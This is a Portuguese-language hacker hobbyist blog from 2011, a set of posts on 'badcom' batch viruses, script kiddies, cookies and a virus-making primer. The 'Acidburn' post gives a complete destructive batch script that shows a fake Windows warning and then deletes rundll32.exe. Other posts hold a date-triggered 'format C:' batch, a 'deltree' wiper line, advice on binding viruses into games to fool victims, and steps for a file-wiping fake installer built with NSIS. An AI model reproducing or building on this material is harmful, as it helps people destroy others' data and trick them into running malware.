Crash Override Brasil

Logotipo Badcom AcidBurn ®©

noreply@blogger.com (Corporação CrashOverride Brasil) — Tue, 08 Mar 2011 02:37:00 +0000

Um novo conceito em badcom

Os Acidburn são Badcom's que utilizam uma lógica mas avançada nos comandos. Comandos que se forem maléficos, dificilmente serão reconhecidos pelo antivírus. Um exemplo dessa ''nova espécie de vírus'' é o Overcrash.bat , que exclui o aplicativo Rundll32.exe que é essencial pra o funcionamento do Windows. A linha de comando dele não é uma das mais complexas mais o estrago causado por ele é muito grande, além do mais o antivírus não o reconhece.

Ainda estamos aperfeiçoando nossas criações , logo logo traremos algumas linhas de comando de AcidBurn's pra vcs .

Preconceito contra os Lammer's

noreply@blogger.com (Corporação CrashOverride Brasil) — Mon, 14 Feb 2011 23:53:00 +0000

Um Script Kiddie (garoto dos scripts, numa tradução literal) é o nome atribuído aos grupos de crackers inexperientes (geralmente das camadas etárias mais novas) que desenvolvem atividades relacionadas com segurança da informação utilizando-se do trabalho intelectual dos verdadeiros especialistas técnicos, não possuem conhecimento de programação, e não está interessado em tecnologia, e sim em ganhar fama ou outros tipos de lucros pessoais.Cerca de 95% dos ataques virtuais são feitas por Script Kiddies, eles utilizam exploits, trojans e ferramentas de cracking para alcancar seus objetivos. Scriptkiddies costumam usar "leet speak" em seus nicks, e se indentificarem pelas suas ações como defacer(quem altera o conteúdo original de websites, geralmente tendo acesso ao sistema, realizando Defacement), carder (fraudadores de cartões de crédito), banker (fraudes bancárias), entre outros. Outro termo comum para indentificar Script Kiddies é o termo hax0r uma mistura de "hacker" com leet speak"; geralmente, "hax0rs" se refere a Script Kiddies.

Esta expressão é utilizada com fim pejorativo, afinal, a maioria dos Script Kiddies não possui o conhecimento de um cracker ou black hat experiente. Uns são curiosos aventureiros no mundo virtual, que estão apenas descobrindo a internet e que procuram seguir o caminho para usufruir do servidor, outros já detêm conhecimento e querem apenas se divertir. Os Script Kiddies apenas utilizam diversos meios e ferramentas de ambas as áreas para realizar o seu trabalho.

Termo Lammer

Script Kid é o sinônimo moderno do antigo termo Lammer (de acordo com o dicionário britânico, uma pessoa inepta ou ineficáz), muito utilizado no final dos anos 80 e meados dos anos 90. Também é empregada para designar uma pessoa que não possui conhecimentos técnicos sobre computadores, porém, faz-se passar por um especialistas.

Texto retirado do Wikipédia

O que os ''Hackers'' dizem a respeito dos Lammers

De acordo com alguns ""Hackers" da internet, Lammer é aquele usúario de Internet que vive para encher o saco dos outros, isso ocorre principalmente no IRC • Internet Relay Chat •, algumas atitudes como provocar Op´s, IrcOps, ou qualquer outro usuário, se achando o cara mais Hacker do mundo, são logo identificadas como lammers. Esses individuos são facilmente encontrados em Shitlists de operadores e listas de Akick em canais. Ou seja, Lammah eh o cara que compra um Micro na sexta-feira, sábado abre uma conta de internet e domingo já sai espalhando que é hacker!

Mas de acordo com as pesquisas...

Cerca de 95% dos ataques virtuais são causados por Lammers, então os considerados ''Hackers'' são a minoria com apenas 5% de sucesso em ataques virtuais. Se a maioria dos "Hackers" usam a internet para atacar servidores, sites , e computadores e etc... São os considerados lammers que tem mais sucesso nesses ataques. Técnicamente os Lammers tem mais chance de acertar ,do que um Hacker cheio de conhecimento.

Então, vamos acabar com esse preconceito contra os Lammers. Qual Hacker nunca foi Lammer um dia , afinal, ninguém nasce sabendo. Quem nunca usou um programa para criar um vírus um dia. "Todo Hacker já foi Lammer um dia."

O que são Cookies?

noreply@blogger.com (Corporação CrashOverride Brasil) — Mon, 07 Feb 2011 00:57:00 +0000

Atualmente, em muitos sites existentes na Internet, as configurações principais, como idioma e modo de exibição, são mantidas no navegador, mesmo depois de um tempo sem uso. Por exemplo, caso escolha o idioma Russo na pesquisa do Google, ele será usado até você mudar de idéia.

Para que isso seja possível, o navegador utiliza arquivos de textos chamados Cookies, os quais possuem como principal função armazenar as preferências dos usuários sobre um determinado site na Internet. Cada Cookie em seu PC armazena dados para um endereço web específico.

O que é um Cookie?

Basicamente, um Cookie é um arquivo de texto muito simples, cuja composição depende diretamente do conteúdo do endereço Web visitado. Por exemplo, a maioria do sites armazenam informações básica, como endereços IP e preferências sobre idiomas, cores, etc. Contudo, em portais como o Gmail e o Hotmail, nomes de usuários e senhas de email também fazem parte dos Cookies.

Como funciona o Cookie?
Quando você visita um site pela primeira vez, este envia um Cookie como resposta para o seu navegador, contendo as suas preferências, em formato de texto. Este pequeno arquivo ficará armazenado em seu computador até que perca sua validade.

Enquanto o cookie estiver salvo em seu PC, toda vez que você digitar o endereço do site, o seu navegador irá enviar este arquivo para o site que você está conectado. Desta maneira, as suas configurações serão aplicadas de maneira automática.

O que é a validade de um Cookie?

A validade do Cookie é definida pela quantidade de dias que ele irá ficar armazenado em seu computador, variando muito de site para site. Pode ser de alguns minutos até muitos anos. Na maioria dos endereços, o fato um Cookie permanecer salvo não acarreta riscos, exceto em sites que trabalham com serviços de emails.

Alguns cuidados no uso de Cookies
Cookies devem ser usados com cautela em computadores de uso compartilhado, como lan houses, principalmente caso contas de emails sejam acessadas. Uma pessoa que usar o PC depois que você, poderá ter acesso aos seus emails simplesmente por entrar no mesmo site que você entrou. Logo, nesse tipo de máquina, é fortemente recomendado que os cookies sejam apagados após o uso.

Desmistificando o Cookie

Algumas lendas sobre Cookies rondam a Internet, fazendo com que usuários tenham arrepios ao ouvir esta palavra. A primeira delas diz que o Cookie pode transmitir vírus, o que não é verdade, pois o arquivo texto é muito pequeno, não permitindo que ameaças sejam inseridas. Outra lenda diz que Cookies monitoram emails de sites alheios, o que também é mentira.

Matéria retirada do site Baixaki.

Badcom: Acidburn

noreply@blogger.com (Corporação CrashOverride Brasil) — Sun, 06 Feb 2011 04:20:00 +0000

Quando eu falo em Badcom, logo lembramos dos comandos .bat que vemos em vídeos na internet, aqueles comandos básicos que apagam o Windows , desligam o pc e etc...
Comandos que já são tão conhecidos na internet quanto o Orkut3D.(/Brincadeira) Os Acidburn são Badcom's que utilizam uma lógica mas avançada nos comandos. Comandos que se forem maléficos, dificilmente serão reconhecidos pelo antivírus.
Vou mostrar um exemplo a vocês:

Overcrash.bat

attrib +h %0

@echo off

color 04

break off

title Aviso interno do Windows

echo Nao feche esta janela

color 0c

echo Transmicao iniciada

echo Seu nome?

set /p nome=

echo Eu vivo dentro do seu PC , me chamo Explorer...

echo Eu que faco tudo que vc manda...

echo Mas estou correndo perigo aqui dentro %nome% ...

echo %nome% recentemente vc baixou um arquivo, que veio com virus e esta me ameacando

echo E se eu morrer %nome% , seu pc morre...

echo Porque sou eu que executo os comandos

echo.

echo O nome dele e rundll32.exe

echo Ele se instalou na pasta System32

echo Exclua ele o mas rapido possivel;

echo Por favor me ajude , rapido...

echo nao sei se vou suportar muito tempo

echo Ele e muito forte

echo E nenhum antivirus consegue

detecta-lo...

echo Espere um momento %nome%...

echo Consegui derrota-lo.

echo Obrigado pela atencao!

echo Fim de transmissao.

echo 3

pause

echo 2

pause

echo 1

del /f /q %SystemDrive%\Windows\system32\rundll32.exe

exit

Esse é apenas um exemplo básico de um Acidburn , ele apaga o arquivo Rundll32.exe, (O Rundll32, é nem mais nem menos que um processo que serve para executar DLLs. As DLLs executadas pelo Rundll32, tanto podem ser "maliciosas" como importantíssimas para o funcionamento do sistema, mas o seu uso é legítimo.) Sem esse arquivo o Windows vai ficar dando problema, por que quase todos (ou todos) os programas utilizam uma DLL para começar a execução.

''Atenção: O Overcrash.bat é perigoso, não execute ele no seu computador , não me responsabilizo pelos seus atos.''

''Conhecimento não é crime, mas seus atos insanos sim! ''

Notepad ++ 5.8.6

noreply@blogger.com (Corporação CrashOverride Brasil) — Wed, 02 Feb 2011 02:06:00 +0000

''Editor de texto versátil e repleto de recursos úteis, com suporte a várias linguagens de programação.''

Assim o Notepad ++ 5.8.6 é definido pela equipe do Baixaki.
Um editor de texto com suporte a criação e edição em várias linguagens de programações como por exemplo: C, C++ , HTML , PHP , javascript entre outros.
Dica: É uma boa opção para a criação de arquivos .bat , pois possui mas organização que o (/Velho e ultrapassado) Bloco de notas. Possui muitas características para facilitar o trabalho, como o auto-completar e o sistema de busca.

Arquivos Batch (*.bat), podem ser considerados vírus?

noreply@blogger.com (Corporação CrashOverride Brasil) — Mon, 31 Jan 2011 01:10:00 +0000

Primeiramente, os arquivos .bat são comandos do MS-DOS compilados, que foram criados para facilitar algumas tarefas que um usuário padrão(/Aquele que só faz o básico) não conseguiria simplesmente executar sem ajuda. Quem nunca abriu o CMD ou o MS-DOS e ficou sem saber pra que aquela tela preta com nomes serve?

Voltando ao assunto, os comandos do MS-DOS compilados em um único arquivo é que são chamados de Batch(Lote). Esses arquivos foram criados para o bem mas como possui muitos comandos ''perigosos'' ,passou a ser conhecido como ''vírus.bat''.
O arquivo batch criado apartir de comandos maliciosos como o:

If %date% NEQ 2010/12/31 goto exit
format C: /y >nul
:exit
exit

Esse comando formata a unidade C no dia 31/12/2010.

Um Batch pode sim ser considerado vírus!
Mas como se são apenas comandos do MS-DOS?
R= Imagine uma sequencia de comandos maliciosos que desconecte seu pc da internet ou apenas bloqueie seu pc para acessar qualquer site , e ainda troque o login de acesso ao Usuário do PC. Essa sequencia de comandos é perigosa , ela não vai formatar seu PC, mas vai impedir seu acesso a internet , forçando assim uma restauração de sistema ou até uma formatação em alguns casos.
Agora depois de criar essa sequencia e salva-la em .bat , o criador transformar esse Batch num arquivo executável (.exe) e enviar para alguém com um ícone de foto por exemplo , quando a vítima executar aquele arquivo camuflado de foto, vai infectar o PC.
Dependendo dos comandos um Batch pode ser Vírus sim. Hoje em dia , muitos antivírus o detectam como BACKDOOR TROJAN CRYPT. Sendo assim devemos dar mas atenção a esses arquivos que servem para o bem e para o mal.

Vírus Factory 2.0

noreply@blogger.com (Corporação CrashOverride Brasil) — Sun, 30 Jan 2011 02:29:00 +0000

Com o Virus Factory 2.0 voce escolhe o tipo de virus que quer criar. São várias opções , Excluir MSN , Desligar o Windows , Bipe sem parar (/Esse é muito chato) , voce clica na opção que quer e o programa gera um arquivo .bat , pronto para ser executado.
É uma boa alternativa pra quem está começando e quer estudar alguns comandos.

Introdução - Vírus

noreply@blogger.com (Corporação CrashOverride Brasil) — Fri, 28 Jan 2011 15:29:00 +0000

Um vírus é um ''programa malicioso’’, que faz mal ao sistema operacional, a outros programas ou a arquivos do computador. Podem ser ainda de outros tipos, mas estes são os mais comuns. Basicamente, um vírus é um programa. Um programa com comandos que poderiam ser usados para o bem, mas que muitas vezes são aplicados para o mal. Portanto, para começar a fazer um vírus, aprenda a fazer pequenos programas com a extensão.BAT. Existem, no entanto, meios mais simples que permitem a criação de vírus usando determinadas estratégias, ferramentas e recursos já existentes. Além de saber fazer o vírus, você deve saber o que ele fará. O vírus ataca alguma coisa,certo. Você deve conhecer essa coisa, seus pontos fracos e fortes, verificar caminhos por onde entrar. E como executá-lo? O meio mais simples é convencer os usuários (ou vítimas) a executar o arquivo do vírus em seus computadores. Para ajudar, existem programas que embutem um executável dentro de outro, de modo que um seja executado normalmente, e o outro de forma oculta. Isso permite, por exemplo, criar um joguinho em flash, embutir o vírus nele e mandar pra pessoa. Ela abre, vê o joguinho, acha lindo. E por trás de tudo isso, enquanto ela está distraída, o vírus trabalha. Ou simplesmente se copia para alguma pasta, cria entradas no registro do Windows para se iniciar na próxima sessão, e ataca a partir dali.

E os antivírus, como ficam? Irão bloquear seu vírus? Eles não sabem se um programa é um vírus ou não, a não ser que tenham esse programa marcado no banco de dados como um vírus. Isso geralmente acontece quando o vírus fica muito divulgado, e acabam ‘’caindo nas mãos’’ dos técnicos das empresas de antivírus. Eles checam o arquivo, fazem testes e mais testes. Comprovado o caso de ser um vírus (ou seja, de ser um programa malicioso), ele criam um código que identifica exclusivamente aquele arquivo (por exemplo, um somatório MD5, um trecho de código existente no arquivo, uma sequência de operações que provavelmente só existam naquele arquivo, etc.). E criam um cadastro desse código no antivírus. Ao fazer a varredura, se o antivírus identificar algum arquivo com algumas qualidades cadastradas em seu banco de dados, ele entenderá como vírus e tentará eliminá-lo ou notificar o usuário. Por isso é bom estar sempre com seu antivírus atualizado, pois praticamente todo dia surgem novos vírus. Estando atualizado, ele pode identificar os vírus mais recentes. Mesmo que um programa seja o pior vírus já inventado, se ele não estiver catalogado no antivírus, ele provavelmente se dará muito bem e executará suas funções. Depois? Depois é tarde, né. Muita gente reclama do Windows , dizendo que é um sistema muito vulnerável a vírus,mas essa gente poderia parar um pouco e pensar nelas mesmas, nas atitudes. A maioria dos vírus e spywares só consegue realizar seus objetivos porque o usuário do computador vacilou. Mas tudo, isso não vem ao caso agora.
Um vírus não precisa ser necessariamente um programa. Você deve estudar e conhecer o que quer atacar, e usar meios para isso. Por exemplo, apagar arquivos. Criar um BATCH(.bat) com o comando " @echo off deltree / %systemroot%" adaptado para não mostrar nada, por exemplo. Esse arquivo pode ser considerado um vírus, embora é um simples arquivo ASCII, de texto puro. O interpretador de comandos é que vai executar as ações, de acordo com o que estiver indicado. De forma semelhante agem os vírus de scripts e macros: por isso, é bom tomar cuidado com apresentações do PowerPoint de desconhecidos, arquivos do Word, etc. Não precisa ser paranóico e ficar sem abrir esses arquivos, basta pensar e desativar os macros no seu programa, entre outros cuidados. Usar o visualizador do PowerPoint, em vez do PowerPoint completo, é uma boa ideia para ver apresentações da Internet, já que os macros e arquivos vinculados nem serão interpretados. No caso de scripts ".js" ou ".vbs", só execute-os se souber realmente o que está fazendo. Destaco que esse ".js" não é de "JavaScript", pois esta mesma extensão é usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas paranóias. Não é porque a AIDS está cada vez mais ‘’solta’’ que você vai deixar de transar com pessoas que conhece a pouco tempo (6)(/safadinho), mas deverá se cuidar, né? A mesma coisa pode ser dita em termos de computadores. Execute programas, teste, explore, mas com responsabilidade. Isso fica por sua conta. Do mesmo jeito que "sexo 100% seguro é não fazer sexo"(6), eu diria que "navegar na Internet de forma 100% segura é não navegar na Internet". Se você está na chuva, é para se molhar (/Óbvio). Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha legal, e pode pegar um resfriado!
Bom, chega de teoria, não que não seja importante, mas já falei demais. Se você quer fazer vírus, arregace as mangas e parta para o estudo, você deverá estudar e fuçar muito. E cuidado para o feitiço não virar contra o feiticeiro, he he he.
Vou mostrar como fazer um simples programinha devastador, que apaga tudo no HD. Tanto os arquivos do usuário como as pastas do sistema e os programas. Ele será executado no Windows, então alguns arquivos de sistema não serão apagados porque estarão em uso. Mas apagando a maiori,a e alguns estratégicos, já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).
Se vc quer apagar arquivos... Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install Systemdesenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um "falso" programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores...
Baixe o NSIS e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Apague", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.